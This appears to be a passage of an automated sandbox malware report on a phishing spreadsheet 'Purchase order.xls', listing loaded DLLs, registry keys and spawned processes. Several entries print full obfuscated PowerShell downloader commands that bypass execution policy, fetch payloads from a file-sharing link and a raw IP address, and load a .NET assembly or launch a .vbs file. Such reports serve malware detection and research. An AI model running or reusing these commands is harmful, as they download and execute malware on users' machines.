Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Section loaded: ucrtbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Section loaded: netapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Section loaded: wkscli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Section loaded: samcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Section loaded: samlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Section loaded: rasadhlp.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: Purchase order.xls

Static file information: File size 1081344 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.pdb source: powershell.exe, 0000000C.00000002.498611259.000000000250E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.pdbhP source: powershell.exe, 0000000C.00000002.498611259.000000000287C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: aspnet_regbrowsers.pdb source: aspnet_regbrowsers.exe, aspnet_regbrowsers.exe, 0000001A.00000002.666825665.0000000001272000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: aspnet_regbrowsers.pdbl source: aspnet_regbrowsers.exe, 0000001A.00000002.666825665.0000000001272000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.pdb source: powershell.exe, 00000005.00000002.511869443.0000000002282000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.pdbhP source: powershell.exe, 00000005.00000002.511869443.0000000002282000.00000004.00000800.00020000.00000000.sdmp

Source: 23530000.0.dr

Initial sample: OLE indicators vbamacros = False

Source: Purchase order.xls

Initial sample: OLE indicators encrypted = True

Data Obfuscation

Obfuscated command line found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"

PowerShell case anomaly found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
